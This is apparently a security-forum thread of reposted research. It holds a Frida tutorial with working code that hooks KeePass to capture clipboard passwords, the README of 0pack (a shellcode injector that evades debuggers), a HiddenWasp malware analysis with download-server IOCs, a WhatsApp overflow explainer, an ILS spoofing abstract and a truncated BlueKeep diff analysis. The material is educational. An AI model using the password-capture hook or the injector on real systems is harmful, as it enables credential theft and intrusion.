this method, we find one reference within the ClipboardUtil.Windows.cs class. It looks like the “SetDataW” method is how KeePass interacts with the clipboard. private static bool SetDataW(uint uFormat, byte[] pbData) { UIntPtr pSize = new UIntPtr((uint)pbData.Length); IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize); if(h == IntPtr.Zero) { Debug.Assert(false); return false; } Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >= (ulong)pbData.Length); // Might be larger IntPtr pMem = NativeMethods.GlobalLock(h); if(pMem == IntPtr.Zero) { Debug.Assert(false); NativeMethods.GlobalFree(h); return false; } Marshal.Copy(pbData, 0, pMem, pbData.Length); NativeMethods.GlobalUnlock(h); // May return false on success if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero) { Debug.Assert(false); NativeMethods.GlobalFree(h); return false; } return true; } This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location and then calls the SetClipBoardData API, passing a handle to the memory containing the contents of pbData. To confirm this is the code we want to target, we can add a breakpoint and debug the app. Before we can build the solution, we need to fix up the singing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (Right click -> Properties -> Signing -> uncheck “Sign the assembly” -> save). With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. If you get a build error, double check you have disabled signing and try again. In this case, the copied password was “AABBCCDD”, which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test. var str = System.Text.Encoding.Default.GetString(pbData); This will convert the pbData byte array to a string, which we can inspect with the debugger. This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn’t need to filter out any calls we don’t care about). Time to fire up Frida. Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple python3 script. import frida import sys import codecs def on_message(message, data): if message['type'] == 'send': print(message['payload']) elif message['type'] == 'error': print(message['stack']) else: print(message) try: session = frida.attach("KeePass.exe") print ("[+] Process Attached") except Exception as e: print (f"Error => {e}") sys.exit(0) with codecs.open('./Inject.js', 'r', 'utf-8') as f: source = f.read() script = session.create_script(source) script.on('message', on_message) script.load() try: while True: pass except KeyboardInterrupt: session.detach() sys.exit(0) This looks complicated, but doesn’t actually do that much. The interesting part happens inside the try/catch block. We attempt to attach to the “KeePass.exe” process, then inject a .js file containing our code to interact with the process and set up messaging. The “on_message” function allows messages to be received from the target process, which we just print to the console. This code is basically generic, so you can re-use it for any other process you want to target. Our code to interact with the process will be written in the “Inject.js” file. First, we need to grab a reference to the SetClipboardData API. var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") We can then attach to this call, which sets up our hook. // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); }, onLeave: function (retval) { } }); The “OnEnter” method is called as the target process calls SetClipboardData. OnLeave, as you might expect, is called just before the hooked method returns. I’ve added a simple console.log call to the OnEnter function, which will let us test our hook and make sure we aren’t getting any erroneous API calls showing up. With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the python script. You should see the “process attached” message. Unlock KeePass and copy a credential. You should see the “KeePass called SetClipboardData” message. KeePass, by default, clears the clipboard after 12 seconds. You will see another “KeePass called SetClipboardData” message when this occurs. We can strip that out later. Looking at the SetClipboardData API document, we can see that two parameters are passed. A format value, and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values, I’ll leave it as an exercise for the reader to modify the PoC to support both formats fully. The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the “args” array. We can then use the Frida API to read data from the address passed to hMem. // Get native pointer to MessageBoxA var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); var ptr = args[1].readPointer().readByteArray(32); console.log(ptr) }, onLeave: function (retval) { } }); Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don’t have. While it should be possible to grab this from other calls, we can side step this complexity by simply reading a set number of bytes. This may be a slightly naive approach, but it’s sufficient for our purposes. Kill the python script and re-run (you don’t need to re-start KeePass). Copy some data and you should see the byte array written to the console. Frida automatically formats the byte array for us. We can see the password “AABCCDD” being set on the clipboard, followed by “ — “ 12 seconds later. This is the string KeePass uses to overwrite the clipboard data. This is enough information to flesh out our PoC. We can convert the byte array to a string, then check if the string starts with “ — “ to remove the data when KeePass clears the clipboard. Note that is is, again, a fairly naive approach and introduces an obvious bug where a password starting with “ — “ would not be captured. Another exercise for the reader! This gives us our complete PoC. // Get native pointer to MessageBoxA var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); var ptr = args[1].readPointer().readByteArray(32); var str = ab2str(ptr); if(!str.startsWith("--")){ console.log("[+] Captured Data!") console.log(str); } else{ console.log("[+] Clipboard was cleared") } }, onLeave: function (retval) { } }); function ab2str(buf){ return String.fromCharCode.apply(null, new Uint16Array(buf)); } The ab2str function converts a byte array to a string, the rest should be self explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared. That’s all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It’s worth noting that you do not need any privileges to inject into the KeePass process, all the examples were run with KeePass and CMD running as a standard user. James Purveyor of fine, handcrafted, artisanal cybers. Sursa: https://medium.com/@two06/fun-with-frida-5d0f55dd331a
  20. Nytro

    0pack

    0pack Description An ELF x64 binary payload injector written in c++ using the LIEF library. Injects shellcode written in fasm as relocations into the header. Execution begins at entrypoint 0 aka the header, this confuses or downright breaks debuggers. The whole first segment is rwx, this can be mitigated at runtime through an injected payload which sets the binaries segment to just rx. Compiler flags The targeted binary must have following flags: gcc -m64 -fPIE -pie Statically linking is not possible as -pie and -static are incompatible flags. Or in other terms: -static means a statically linked executable with no dynamic > relocations and only PT_LOAD segments. -pie means a shared library with > dynamic relocations and PT_INTERP and PT_DYNAMIC segments. Presentation links HTML: https://luis-hebendanz.github.io/0pack/ PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm Debugger behaviour Debuggers don't generally like 0 as the entrypoint and oftentimes it is impossible to set breakpoints at the header area. Another often occured issue is that the entry0 label gets set incorrectly to the main label. Which means the attacker can purposely mislead the reverse engineer into reverse engineering fake code by jumping over the main method. Executing db entry0 in radare2 has this behaviour. Affected debuggers radare2 Hopper gdb IDA Pro --> Not tested 0pack help Injects shellcode as relocations into an ELF binary Usage: 0pack [OPTION...] -d, --debug Enable debugging -i, --input arg Input file path. Required. -p, --payload arg Fasm payload path. -b, --bin_payload arg Binary payload path. -o, --output arg Output file path. Required. -s, --strip Strip the binary. Optional. -b, --bin_payload The bin_payload option reads a binary file and converts it to ELF relocations. 0pack appends to the binary payload a jmp to the original entrypoint. -p, --payload Needs a fasm payload, 0pack prepends and appends a "push/pop all registers" and a jmp to the original entrypoint to the payload. Remarks Altough I used the LIEF library to accomplish this task, I wouldn't encourage to use it. It is very inconsistent and intransparant in what it is doing. Often times the library is downright broken. I did not find a working library for x64 PIE enabled ELF binaries. If someone has suggestions, feel free to email me on: luis.nixos@gmail.com Dependencies cmake version 3.12.2 or higher build-essential gcc fasm Use build script $ ./build.sh Build it manually $ mkdir build $ cd build $ cmake .. $ make $ ./../main.elf Sursa: https://github.com/Luis-Hebendanz/0pack
  21. HiddenWasp Malware Stings Targeted Linux Systems Ignacio Sanmillan 29.05.19 | 1:36 pm Share: Overview • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems. • The malware is still active and has a zero-detection rate in all major anti-virus systems. • Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control. • Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance. • HiddenWasp authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families, however the attribution is made with low confidence. • We have detailed our recommendations for preventing and responding to this threat. 1. Introduction Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild. Unlike Windows malware, Linux malware authors do not seem to invest too much effort writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers. In addition, Anti-Virus solutions for Linux tend to not be as resilient as in other platforms. Therefore, threat actors targeting Linux systems are less concerned about implementing excessive evasion techniques since even when reusing extensive amounts of code, threats can relatively manage to stay under the radar. Nevertheless, malware with strong evasion techniques do exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilize strong evasion techniques and can be easily adapted by attackers. We believe this fact is alarming for the security community since many implants today have very low detection rates, making these threats difficult to detect and respond to. We have discovered further undetected Linux malware that appear to be enforcing advanced evasion techniques with the use of rootkits to leverage trojan-based implants. In this blog we will present a technical analysis of each of the different components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed to several open-source malware. The following images are screenshots from VirusTotal of the newer undetected malware samples discovered: 2. Technical Analysis When we came across these samples we noticed that the majority of their code was unique: Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another. 2.1 Initial Deployment Script: When we spotted these undetected files in VirusTotal it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary. We observed that these files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong. Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes: Thanks to this file we were able to download further artifacts not present in VirusTotal related to this campaign. This script will start by defining a set of variables that would be used throughout the script. Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system: Furthermore, after the system’s user account has been created, the script proceeds to clean the system as a means to update older variants if the system was already compromised: The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script: After malware components have been installed, the script will then proceed to execute the trojan: We can see that the main trojan binary is executed, the rootkit is added to LD_PRELOAD path and another series of environment variables are set such as the ‘I_AM_HIDDEN’. We will cover throughout this post what the role of this environment variable is. To finalize, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local. Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly. The deployment script has interesting insights of further features that the malware implements, such as the introduction of a new environment variable ‘HIDE_THIS_SHELL’: We found some of the environment variables used in a open-source rootkit known as Azazel. It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN. We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. The majority of the code from the rootkit implants involved in this malware infrastructure are noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project. 2.2 The Rootkit: The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism. It is delivered in the form of an ET_DYN stripped ELF binary. This shared object has an DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object gets loaded by a given process: Within this function we can see that eventually control flow falls into a function in charge to resolve a set of dynamic imports, which are the functions it will later hook, alongside with decoding a series of strings needed for the rootkit operations. We can see that for each string it allocates a new dynamic buffer, it copies the string to it to then decode it. It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit. When we wrote the script to simulate the cipher that implements the string decoding function we observed the following algorithm: We recognized that a similar algorithm to the one above was used in the past by Mirai, implying that authors behind this rootkit may have ported and modified some code from Mirai. After the rootkit main object has been loaded into the address space of a given process and has decrypted its strings, it will export the functions that are intended to be hooked. We can see these exports to be the following: For every given export, the rootkit will hook and implement a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it is checked whether the environment variable ‘I_AM_HIDDEN’ is set: We can see an example of how the rootkit hooks the function fopen in the following screenshot: We have observed that after checking whether the ‘I_AM_HIDDEN’ environment variable is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, specifically to the fopen function it will also check whether the file to open is ‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by scanning every entry for the destination or source ports used to communicate with the cnc, in this case 61061. This is also the default port in Azazel rootkit. The rootkit primarily implements artifact hiding mechanisms as well as tcp connection hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in the following diagram: 2.3 The Trojan: The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to some common MD5 implementation in one of the statically linked libraries it was linked with: In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared in Chinese hacking forums: When we analyze the main we noticed that the first action the trojan takes is to retrieve its configuration: The malware configuration is appended at the end of the file and has the following structure: The malware will try to load itself from the disk and parse this blob to then retrieve the static encrypted configuration. Once encryption configuration has been successfully retrieved the configuration will be decoded and then parsed as json. The cipher used to encode and decode the configuration is the following: This cipher seems to be an RC4 alike algorithm with an already computed PRGA generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs. After the configuration is decoded the following json will be retrieved: Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker’s LD_PRELOAD path. This location is usually at /etc/ld.so.preload, however there is always a possibility to patch the dynamic linker binary to change this path: Patch_ld function will scan for any existent /lib paths. The scanned paths are the following: The malware will attempt to find the dynamic linker binary within these paths. The dynamic linker filename is usually prefixed with ld-<version number>. Once the dynamic linker is located, the malware will find the offset where the /etc/ld.so.preload string is located within the binary and will overwrite it with the path of the new target preload path, that one being /sbin/.ifup-local. To achieve this patching it will execute the following formatted string by using the xxd hex editor utility by previously having encoded the path of the rootkit in hex: Once it has changed the default LD_PRELOAD path from the dynamic linker it will deploy a thread to enforce that the rootkit is successfully installed using the new LD_PRELOAD path. In addition, the trojan will communicate with the rootkit via the environment variable ‘I_AM_HIDDEN’ to serialize the trojan’s session for the rootkit to apply evasion mechanisms on any other sessions. After seeing the rootkit’s functionality, we can understand that the rootkit and trojan work together in order to help each other to remain persistent in the system, having the rootkit attempting to hide the trojan and the trojan enforcing the rootkit to remain operational. The following diagram illustrates this relationship: Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts: These artifacts are the following: By performing some OSINT regarding these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng hosted in GitHub: The fact that these artifacts are being searched for suggests that potentially targeted Linux systems by these implants may have already been compromised with some variant of this open-source rootkit as an additional artifact in this malware’s infrastructure. Although those paths are being searched for in order to hide their presence in the system, it is important to note that none of the analyzed artifacts related to this malware are installed in such paths. This finding may imply that the target systems this malware is aiming to intrude may be already known compromised targets by the same group or a third party that may be collaborating with the same end goal of this particular campaign. Moreover, the trojan communicated with a simple network protocol over TCP. We can see that when connection is established to the Master or Stand-By servers there is a handshake mechanism involved in order to identify the client. With the help of this function we where able to understand the structure of the communication protocol employed. We can illustrate the structure of this communication protocol by looking at a pcap of the initial handshake between the server and client: We noticed while analyzing this protocol that the Reserved and Method fields are always constant, those being 0 and 1 accordingly. The cipher table offset represents the offset in the hardcoded key-stream that the encrypted payload was encoded with. The following is the fixed keystream this field makes reference to: After decrypting the traffic and analyzing some of the network related functions of the trojan, we noticed that the communication protocol is also implemented in json format. To show this, the following image is the decrypted handshake packets between the CNC and the trojan: After the handshake is completed, the trojan will proceed to handle CNC requests: Depending on the given requests the malware will perform different operations accordingly. An overview of the trojan’s functionalities performed by request handling are shown below: 2.3. Prevention and Response Prevention: Block Command-and-Control IP addresses detailed in the IOCs section. Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to be able to detect these implants. In addition, in order to check if your system is infected, you can search for “ld.so” files — if any of the files do not contain the string ‘/etc/ld.so.preload’, your system may be compromised. This is because the trojan implant will attempt to patch instances of ld.so in order to enforce the LD_PRELOAD mechanism from arbitrary locations. 4. Summary We analyzed every component of HiddenWasp explaining how the rootkit and trojan implants work in parallel with each other in order to enforce persistence in the system. We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected. Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats. Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility. IOCs 103.206.123[.]13 103.206.122[.]245 http://103.206.123[.]13:8080/system.tar.gz http://103.206.123[.]13:8080/configUpdate.tar.gz http://103.206.123[.]13:8080/configUpdate-32.tar.gz e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3 f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b 0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8 2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0 d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0 609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578 8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2 8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b By Ignacio Sanmillan Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducting projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format. Sursa: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
      • 1
      • Upvote
  22. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw Try it Yourself WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself. 10 MINUTE READ WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world’s most-popular messaging app with 1.5 billion monthly users from 180 countries and has always prided itself on being secure. Below, we’ll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability. Try out the hack First, what’s up with WhatsApp security? WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance due to the company’s early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal Messaging Protocol deployed by WhatsApp. We suspect that the company’s security eminence and focus on baking in privacy comes from the strong security mindset of WhatsApp founder Jan Koum who grew up as a hacker in the w00w00 hacker clan in the 1990s. But WhatsApp was then used for … surveillance? WhatsApp’s reputation as a secure messaging app and its popularity amongst activists made the report of a 3rd party company stealthily offering turn-key targeted surveillance against WhatsApp’s Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli company the NSO Group, is likely an offshoot of Unit 8200 that was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program, and has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and allegedly aiding the Saudi regime spy on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO. The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case. So what went wrong? Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that the chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting communications of their target if they could instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages. According to a brief security advisory issued by Facebook, the attack against WhatsApp was a previously unknown (0-day) vulnerability in the mobile app. A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what’s called a buffer overflow memory corruption vulnerability due to insufficient checking of length of data. I’ve heard the term buffer overflow. But I don’t really know what it is. To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let’s imagine this memory as a vast row of labeled boxes, sequentially from 0. (Photo by Samuel Zeller on Unsplash) Suppose some program, through dynamic memory allocation, opts to store the name of the current user (“mom”) as the three characters “m”, “o” and “m” in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards. A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of “mom” inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in “mommy”. The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there. But how does this relate to security? Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004 with the control flow of the program always impacted, then it’s highly likely that the programmer has already discovered their mistake when testing the program -- the program is bound to fail each time, afterall. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have failed the sniff test and persisted in the code base. Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for the program to figure out how the program should continue to run. The formal word is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function). Suddenly, the path of the program execution can be influenced by the user. It’s like you could tell somebody else’s program, “Hey, you should do X, Y and Z”, and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do? I would … tell the program to .. take over the computer? You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running. This choice of a payload is the craft of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?) Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code. Both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string “mommy”, that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers, first hypothetically in 1972 and then practically by MIT’s Robert T. Morris’s Morris worm that swept the internet in 1988 and Aleph One’s 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack. The second idea, which was crystalized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions that are already contained within the program in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers without the author needing to provide any handwriting. (Image generated with Ransomizer.com) Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state-of-the-art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018. Ahh… but what happened with WhatsApp? What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code in the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information of how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transmission Protocol). (Image credit: CheckPoint Research) The odd choices for variable names and structure are artifacts from the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response to signal a picture loss (PLI) (code is illustrative): int length_argument = /* from incoming RTCP packet */ qmemcpy( &outgoing_rtcp_payload[ offset ], incoming_rtcp_packet, length_argument ); /* Continue building RTCP PLI packet and send */ But if the remaining size of the payload buffer (after offset) is less than the length_argument, a number supplied by the hacker, information from the incoming packet would be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload ! Just like the situation with the buffer overflow before, these overwritten data could include data that could later direct the control flow of the program, like an overwritten function pointer. In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user. As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frame so that the lengths in the incoming packet will cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running. Try it yourself? Buffer overflows are technical flaws, and build on an understanding of how computers execute code. Given how prevalent they are, and important -- as illustrated by the WhatsApp attack, we believe we should all better understand how such bugs are exploited to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence. Do you like this kind of thing? Go read about how Facebook got hacked last year and try out hacking it yourself. Learn more about our security training platform for developers at adversary.io Sursa: https://blog.adversary.io/whatsapp-hack/
      • 1
      • Upvote
  23. Wireless Attacks on Aircraft Instrument Landing Systems Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir Khoury College of Computer Sciences Northeastern University, Boston, MA, USA Abstract Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers demonstrated vulnerabilities in many aviation systems. However, the resilience of the aircraft landing systems to adversarial wireless attacks have not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commerciallyavailable SDR, causing last-minute go around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine-grain control the course deviation indicator as displayed by the ILS receiver, in realtime. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary’s transmitted signals as a function of the aircraft GPS location, maintaining power and deviation consistent with the adversary’s target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA certified flight-simulator (X-Plane)’s AI-based autoland feature, and demonstrate systematic success rate with offset touchdowns of 18 meters to over 50 meters. Download: https://aanjhan.com/assets/ils_usenix2019.pdf
  24. Analysis of CVE-2019-0708 (BlueKeep) By : MalwareTech May 31, 2019 I held back this write-up until a proof of concept (PoC) was publicly available, as not to cause any harm. Now that there are multiple denial-of-service PoC on github, I’m posting my analysis. Binary Diffing As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results. A BinDiff of TermDD.sys pre and post patch. Most of the changes turned out to be pretty mundane, except for “_IcaBindVirtualChannels” and “_IcaRebindVirtualChannels”. Both functions contained the same change, so I focused on the former as bind would likely occur before rebinding. Original IcaBindVirtualChannels is on the left, the patched version is on the right. New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to “MS_T120”, then parameter three of _IcaBindChannel is set to the 31. Based on the fact the change only takes place if v4+88 is “MS_T120”, we can assume that to trigger the bug this condition must be true. So, my first question is: what is “v4+88”?. Looking at the logic inside IcaFindChannelByName, i quickly found my answer. Inside of IcaFindChannelByName Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel, by its name. The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure. Using all of the above, I came to the conclusion that “MS_T120” is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120. I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspecting the channel name and call stack. The callstack and channel name upon the first call to IcaBindVirtualChannels The very first call to IcaBindVirtualChannels is for the channel i want, MS_T120. The subsequent channel names are “CTXTW “, “rdpdr”, “rdpsnd”, and “drdynvc”. Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, i’d need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name. So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. Just need to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight. A capture of the RDP connection sequence The channel array, as seen by WireShark RDP parser The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need. Seeing as MS_T120 and CTXTW are not specified anywhere, but opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels. After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test. Breakpoint is hit after adding MS_T120 to the channel array Awesome! Now the vulnerable code path is hit, I just need to figure out what can be done… To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection. The call stack when the IcaCreateChannel 